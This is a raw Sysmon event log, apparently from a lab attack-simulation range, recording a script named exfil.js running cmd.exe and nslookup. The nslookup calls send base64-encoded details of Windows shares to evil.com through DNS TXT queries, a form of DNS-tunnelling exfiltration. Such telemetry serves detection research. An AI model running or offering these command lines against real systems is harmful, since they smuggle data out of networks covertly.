14:16:19.709{2E1864BB-17A1-629A-783D-000000005F02}5552336C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-173F-000000005F02}5128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.709{2E1864BB-17B3-629A-173F-000000005F02}5128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfotgk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.706{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpiwc.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-17B3-629A-153F-000000005F02}49925960C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-163F-000000005F02}4336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-163F-000000005F02}4336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.658{2E1864BB-17B3-629A-143F-000000005F02}54805472C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-163F-000000005F02}4336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.665{2E1864BB-17B3-629A-163F-000000005F02}4336C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-143F-000000005F02}5480C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpiwc.tmp 2>&1 10341000x8000000000000000197183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.626{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-153F-000000005F02}4992C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.626{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-153F-000000005F02}4992C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000197181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.209{00000000-0000-0000-0000-000000000000}7488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.058{00000000-0000-0000-0000-000000000000}6116evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.919{00000000-0000-0000-0000-000000000000}2672evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.780{00000000-0000-0000-0000-000000000000}5100evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000197177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.611{2E1864BB-17B3-629A-153F-000000005F02}49925960C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-143F-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.611{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-153F-000000005F02}4992C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.601{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.601{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.600{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.600{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.600{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-143F-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.600{2E1864BB-17A1-629A-783D-000000005F02}55527584C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-143F-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.599{2E1864BB-17B3-629A-143F-000000005F02}5480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpiwc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.584{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxvalw.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.568{2E1864BB-17B3-629A-123F-000000005F02}58848136C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-133F-000000005F02}7428C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.553{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-133F-000000005F02}7428C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.553{2E1864BB-17B3-629A-113F-000000005F02}57721524C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-133F-000000005F02}7428C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.566{2E1864BB-17B3-629A-133F-000000005F02}7428C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com 